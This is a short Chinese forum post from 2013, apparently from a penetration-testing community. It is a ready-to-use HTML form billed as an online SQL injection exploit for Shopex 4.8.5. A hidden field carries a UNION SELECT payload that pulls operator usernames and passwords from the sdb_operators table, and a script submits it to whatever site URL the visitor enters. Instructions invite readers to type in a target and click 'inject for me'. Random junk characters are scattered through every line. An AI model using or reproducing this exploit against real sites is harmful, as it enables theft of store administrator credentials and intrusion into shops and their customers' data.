<center>. E7 d5 Q" Z( f/ e
<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>0 {6 s/ k; U9 ^" N3 L& H
<form action="" method="post" name="submit_url">
% I) Z! C8 l2 ]. Q! x网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>
x9 }' R' [. y4 q; W2 v% P<input type="hidden" name="goods[goods_id]" value="3">
, n, ^! A e: `' M7 R* `" T<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">
/ E x5 r# Y7 n2 p<input type="submit" value="给我注入" onclick=fsubmit()>! L0 w" ^, s$ T
</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com' e& k% H# j: G) x' V: v$ z! u
) B$ {. y8 n9 ]; h) l# F7 [/ e<script>
6 \$ u! c3 Y3 a' p/ q1 Dfunction fsubmit(){
n* o" r% e- ] D1 sform = document.forms[0];
' m# ], L" S2 e& k$ }% l5 fform.action = form.url.value+'/?product-gnotify'; 6 i, b1 d% ^; u. { K2 o
form.submit(); . E$ I6 j+ `5 ]5 u* O8 Z% }
} 5 c |+ @/ V9 y0 s0 E/ R# K
</script>, O& f+ u, O# ]7 v: }) S" }1 A
|
发表于 2013-1-23 09:20:52
收藏
支持
反对